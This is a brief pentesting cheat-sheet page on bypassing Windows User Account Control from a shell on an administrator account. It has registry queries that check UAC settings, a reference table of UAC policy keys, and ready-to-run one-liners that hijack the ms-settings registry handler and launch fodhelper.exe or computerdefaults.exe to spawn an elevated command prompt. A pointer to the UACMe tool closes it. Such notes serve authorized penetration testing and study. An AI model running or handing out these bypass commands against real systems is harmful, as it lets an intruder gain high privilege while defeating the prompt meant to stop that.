Use this when we have only a shell of an Administrator account and no graphical UI so we cannot click on the “Run as admin” UAC popup.

Not exactly a privilege escalation technique. Windows does not consider this feature a security setting

UAC enabled?#

REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v EnableLUA
REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v ConsentPromptBehaviorAdmin

There are more to query, but generally those two are good enough.

You can see the meaning of value return in the table down there.

Group Policy Setting Registry Key Default Setting
User Account Control: Admin Approval Mode for the built-in Administrator account FilterAdministratorToken Disabled
User Account Control: Allow UIAccess applications to prompt for elevation without using the secure desktop EnableUIADesktopToggle Disabled
User Account Control: Behavior of the elevation prompt for administrators in Admin Approval Mode ConsentPromptBehaviorAdmin Prompt for consent for non-Windows binaries
User Account Control: Behavior of the elevation prompt for standard users ConsentPromptBehaviorUser Prompt for credentials on the secure desktop
User Account Control: Detect application installations and prompt for elevation EnableInstallerDetection Enabled (default for home) Disabled (default for enterprise)
User Account Control: Only elevate executables that are signed and validated ValidateAdminCodeSignatures Disabled
User Account Control: Only elevate UIAccess applications that are installed in secure locations EnableSecureUIAPaths Enabled
User Account Control: Run all administrators in Admin Approval Mode EnableLUA Enabled
User Account Control: Switch to the secure desktop when prompting for elevation PromptOnSecureDesktop Enabled
User Account Control: Virtualize file and registry write failures to per-user locations EnableVirtualization Enabled

Fodhelper#

reg add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "cmd.exe" && start fodhelper.exe

Computerdefaults#

reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /v DelegateExecute /t REG_SZ /d "" /f && reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /ve /t REG_SZ /d "cmd.exe" /f && start computerdefaults.exe

UACMe#

Github Page

Backward PrintNightmare User Interactions Forward